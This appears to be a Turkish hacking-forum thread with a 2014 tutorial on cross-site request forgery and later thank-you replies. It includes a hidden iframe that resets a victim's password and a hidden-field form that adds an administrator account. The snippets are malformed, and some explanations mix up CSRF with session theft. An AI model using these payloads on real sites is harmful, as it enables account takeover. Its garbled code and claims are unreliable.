İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

CSRF- XSRF Anlatım

16-02-2014 13:19
#1
Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.064
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6362
Konular:
969
Ticaret:
(0) %
*** Csrf Nedir ***

Cross-Site Request Forgery (Csrf - Xsrf - Cross Site Reference Forgery)
Webmaster’ların Coding & Security bilgi eksikliğinden kaynaklanan güvenlik zaafiyetidir. Site Yetkilisinin Haberi Olmaksızın Güvenlik Açığının İstismar

Edilmesidir.
Saldırganın Javascript veya Html Kodlarıyla Yetkilinin Oturum Bilgilerini Çalma Olayıdır.
Kurban Önceden Hazırlanmış Bu Js ve HTML Dosyalarına Tıkladığı Anda Kapana Düşer. Böylelikle Kurbanın Session (Oturum) Bilgileri Saldırgan Tarafından

Değiştirilmiş Olur.

*** Csrf Attack Kullanılarak Yapılabilecekler ***

Ben Bu Yöntemi Hayal Gücü İle Sınırlıyorum (Tabi Sistemin Güvenliğini Göz Önünde Bulundurarak) Aklınıza Gelebilecek Herşey ve Sistemin İçeriğine Göre

Saldırganın Tam Yetki Alması Sağlanabilir , Kurbanı Yani Yetkiliyi Devre Dışı Bırakabilir Hatta İleri Düzey Olarak Düşünürsek Banka Hesapları İle Transfer Bile

Yapılabilir.

*** Saldırı Öncesi Bilgiler ve Kod Mantığı ***

Kurban.Com/Sifre.php - Kurbanımızın Sifre Değiştirme Paneli

Link Get Methoduyla Alındığından Url Şu Şekilde Değişecektir;

Kurban.Com/Sifre.php?sifre=Root - Burdan Kullanıcının Yeni Şifresinin Root Olduğunu Görebiliyorsunuz.

İşi Kod Mantığına Dökersek GET Metodu İle Gönderilen İstek Şöyledir.

<Form Method="Get" Action="Sifre.php">
<Input Type="Text" Name="sifre" />
<Input Type="Submit" Name="Submit" Value="Submit" />
</Form>

Kodları Açıklayalım ;

* User Click Yani Tıklama Anında , Sunucudan Get Methoduyla Bilgileri Çekip, Sifre.php’yi Çalıştırmış Olur. <Form Method="Get" Action="Sifre.php">
* Sonrasında Server Sifre.php’yi Referans Alarak Verileri Çeker.

*** Exploiting ***

Saldırganın Hazırladığı Masum Görünen Ama Zararlı Kodlar Barındıran Sayfamız ;

Kurban.Com/PaketEder.htm

Söylediğimiz Gibi, Dıştan Görünümü Gayet Masum Bir Sayfa.
Fakat, İframe ile , Kurbanın Bilgisi Dışında Şifresi Değişecek ve Kurban Kapana Düşmüş Olacaktır.

İframe Kodlarınızı Biliyoruz Ancak Bilmeyenler İçin Örneklendirirsek ;

<iframe src= "Http://Kurban.Com/Sifresifre=Root>

Böylelikle Click Anında Şifre Root Olarak Değişecektir.

CSRF İle Yetkili Şifrelerini Değiştirmenin Yanı Sıra Yetkili Ekleme , Yekili Değiştime , Silme İşlemleri de Yapılabilir.Örnek Verecek Olursak ;

<html>
<form name=admin action=http://kurban/yoneticiaction=user_ekle method=post>
<input type=hidden name=action value=user_ekle><br/>
<input type=hidden value=usre name=Root><br/>
<input type=hidden value=pass name=Toor><br/>
<input type=hidden value=Administrator name=Root><br/>
<input type=hidden value=email name=root@toor"> *** NOT ***
Yeni Arkadaşların Çokca Karıştırdığı Bir Nokta Var.Ona Değinmek İstiyorum.

Cross Site Scripting ve CSRF’nin Aynı Şey Olduğunu Sanan Arkadaşlar Var.Aynı Şeyler Değildirler.Xss (Cross Site Scripting ) Açık Olan Sistemden Kurbana

Gerek Kalmadan Direkt Cookie Çekme İşlemidir.

CSRF İse Kurbanın Bilgisizliği ve Zararlı Kodun , Yetkili Kurbana Çalıştırılmasıyla Oluşur.
Kullanıcı İmzası
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info

03-06-2016 20:11
#2
LCF - ait Kullanıcı Resmi (Avatar)
LCF
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2016
Nereden:
Databsabe
Yaş:
17
Mesajlar:
637
Teşekkür (Etti):
152
Teşekkür (Aldı):
54
Konular:
54
Ticaret:
(0) %
Ellerinize Saglik Hocam
Konu Black-Leonx' tarafından (03-06-2016 20:15 Saat 20:15 ) değiştirilmiştir.
28-08-2016 03:59
#3
Slown - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
Zaton
Mesajlar:
609
Teşekkür (Etti):
46
Teşekkür (Aldı):
62
Konular:
74
Ticaret:
(0) %
Sağolun hocam uygulayacağım
Kullanıcı İmzası
We're hacking strangers..!

23-09-2016 23:13
#4
Üyelik tarihi:
07/2012
Nereden:
Adana
Yaş:
29
Mesajlar:
479
Teşekkür (Etti):
22
Teşekkür (Aldı):
24
Konular:
55
Ticaret:
(0) %
yararlı bilgiler eywallah
Kullanıcı İmzası
Iletişim için : fb.com/xdferlesh , Yapamadığınız Şeyleri Teamviewerden yardımcı olurum
06-10-2016 17:26
#5
Droit97 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
489
Teşekkür (Etti):
37
Teşekkür (Aldı):
59
Konular:
9
Ticaret:
(0) %
elinize saglik yararli konu
06-10-2016 21:06
#6
PeaCkopAt - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
117
Teşekkür (Etti):
26
Teşekkür (Aldı):
18
Konular:
14
Ticaret:
(0) %
eline sağlık hocam güzel anlatım
10-01-2017 23:26
#7
Üyelik tarihi:
02/2008
Nereden:
DERİNLERDE..
Yaş:
32
Mesajlar:
403
Teşekkür (Etti):
42
Teşekkür (Aldı):
155
Konular:
22
Ticaret:
(0) %
Elleriniz dert görmesin nice paylasımlara.
Kullanıcı İmzası
єğєя вυ мєѕαנιмℓα ѕαηα уαя∂ιм є∂євι̇ℓ∂ι̇уѕєм тєşєккüя єтмєуι υηυтмα.!!


Cahillerle asla tartişmayin , Çünkü ben asla galip gelemedim.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı